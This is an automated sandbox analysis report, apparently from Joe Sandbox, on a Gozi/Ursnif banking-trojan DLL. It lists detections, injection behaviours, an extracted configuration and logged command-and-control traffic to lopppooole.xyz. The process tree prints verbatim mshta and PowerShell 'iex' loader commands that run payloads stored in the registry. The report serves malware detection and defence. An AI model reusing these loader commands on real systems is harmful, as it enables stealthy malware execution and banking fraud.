Play interactive tour

Edit tour

Analysis Report mal.dll

Overview

General Information

Sample Name:	mal.dll
Analysis ID:	341461
MD5:	640cf281c09e54fab9c5d0153dffc042
SHA1:	9ae08274286b72b5dab240645af0f513dab2852d
SHA256:	a2fa5a4d18033e67a7c0477e69acd03a61808c31e24dd9c120106fec161012ef
Tags:	brtdllgoziisfbursnif
Most interesting Screenshot:

Detection

Gozi Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Gozi e-Banking trojan

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Hooks registry keys query functions (used to hide registry keys)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6652 cmdline: loaddll32.exe 'C:\Users\user\Desktop\mal.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)

regsvr32.exe (PID: 6660 cmdline: regsvr32.exe /s C:\Users\user\Desktop\mal.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

control.exe (PID: 6348 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

cmd.exe (PID: 6668 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

iexplore.exe (PID: 6688 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6736 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5168 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17426 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4772 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:82958 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4000 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17442 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5088 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:82974 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 4332 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 7068 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 1384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 2024 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 1760 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3736.tmp' 'c:\Users\user\AppData\Local\Temp\kboh4jur\CSC3D4FC79349B84E14A11DB5BE381E50D0.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 6508 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 4608 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES48CA.tmp' 'c:\Users\user\AppData\Local\Temp\xjciegge\CSCE781F4B6FB444C94B757D31BBD45D613.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@216041hh6:", "dns": "216041", "version": "251173", "uptime": "219", "crc": "2", "id": "4355", "user": "253fc4ee08f8d2d8cdc8873a4f316e0b", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.474076066.0000000004C1C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.421520265.0000000004E18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.421722913.0000000004E18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.421588649.0000000004E18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000026.00000002.559791102.0000000000CC6000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.421746535.0000000004E18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.421559513.0000000004E18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.421467795.0000000004E18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.421622681.0000000004E18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.421656779.0000000004E18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 7068	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: control.exe PID: 6348	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 6660	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 12 entries

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7068, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline', ProcessId: 2024

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4332, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ProcessId: 7068

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7068, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline', ProcessId: 2024

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: regsvr32.exe.6660.1.memstr

Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@216041hh6:", "dns": "216041", "version": "251173", "uptime": "219", "crc": "2", "id": "4355", "user": "253fc4ee08f8d2d8cdc8873a4f316e0b", "soft": "3"}

Multi AV Scanner detection for submitted file

Show sources

Source: mal.dll

Virustotal: Detection: 8%

Perma Link

Compliance:

Uses 32bit PE files

Show sources

Source: mal.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.3:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.3:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49740 version: TLS 1.2

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: mal.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.pdbXP source: powershell.exe, 0000001F.00000002.588416083.000002BCB044F000.00000004.00000001.sdmp
Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000022.00000002.524161454.000001F970260000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.534868528.0000022F9CC10000.00000002.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.pdb source: powershell.exe, 0000001F.00000002.588110987.000002BCB0417000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.pdbXP source: powershell.exe, 0000001F.00000002.588110987.000002BCB0417000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.532411050.0000000005AF0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.532411050.0000000005AF0000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 00000026.00000002.562617431.0000018E5BDEC000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000026.00000002.562617431.0000018E5BDEC000.00000004.00000040.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.pdb source: powershell.exe, 0000001F.00000002.587767653.000002BCB03D7000.00000004.00000001.sdmp
Source:	Binary string: c:\Movenear\AgoSection\placeRace\Liquid.pdb source: mal.dll

Spreading:

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A1056C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_04A1056C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_049FBF1E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	1_2_049FBF1E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A0AF0E lstrlenW,wcscpy,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_04A0AF0E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A09363 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_04A09363

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04A05ECD wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

1_2_04A05ECD

Networking:

Source: Joe Sandbox View	IP Address: 87.248.118.23 87.248.118.23
Source: Joe Sandbox View	IP Address: 151.101.1.44 151.101.1.44

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic	HTTP traffic detected: GET /manifest/QNYwAwEGA6Nk/oqkcQpDHt62/AROwNcnS85Yj6H/Kiw419AbdChBoBC1YflBI/btAWmao42bhmIwaw/rj9hokXq7cOPoMP/C6Fociq1a8i5R_2FP7/qMKfDX8g_/2FYBsdaqsojE5zyNbglU/W9s5aDB_2BHGEIqE0sh/uWRUQeNVDF60PzY5NXM2Np/58y3_2Bk8eYWnbwr0ru/GleU.cnx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lopppooole.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: lopppooole.xyzConnection: Keep-AliveCookie: PHPSESSID=rs7eiful1fouqitmbglbv8teg2; lang=en
Source: global traffic	HTTP traffic detected: GET /manifest/DGnwMOevMC4C/FwTBVjFVT7Q/om1iea6xc3SLTm/LhexSznuxAV0l1eIdd7aN/EYbCXiwsAXb_2FQL/BI0B_2BEHYbzkri/CVbt6Ud3hbu6juyQ39/_2FdPSw_2/FAhy67XuasfNyAs2fp_2/FWN1bdwTDPIYYGwfcgE/MI3f3RUzobEk8E33KaQBi_/2BX59YotVm2s8/5lk6oUdX/LH2keW.cnx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lopppooole.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=rs7eiful1fouqitmbglbv8teg2
Source: global traffic	HTTP traffic detected: GET /manifest/kCTdQ_2BVGuRh3/WFBmy05TUuAn4xtP9_2FP/3n_2FnxuIWQ3b206/ecbDlimfQBclFip/FJAwdVz_2B9TFd3nBh/UoR5h5TF0/yDm4Cf1AP8eKKLirBNO7/RmInQmK7NiugHEy8vMH/YJS_2FmFR3z8cT16Qz_2FU/950pqlOH2MscB/Oa5ScIjD/o2f5QwKQBtWpjzyRW_2B5nY/gM3maYjp.cnx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lopppooole.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=rs7eiful1fouqitmbglbv8teg2

Source: de-ch[1].htm.4.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x48741d7a,0x01d6ee9f</date><accdate>0x48741d7a,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x48741d7a,0x01d6ee9f</date><accdate>0x48741d7a,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48767fe3,0x01d6ee9f</date><accdate>0x48767fe3,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48767fe3,0x01d6ee9f</date><accdate>0x48767fe3,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4878e2c6,0x01d6ee9f</date><accdate>0x4878e2c6,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4878e2c6,0x01d6ee9f</date><accdate>0x4878e2c6,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.4.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.4.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
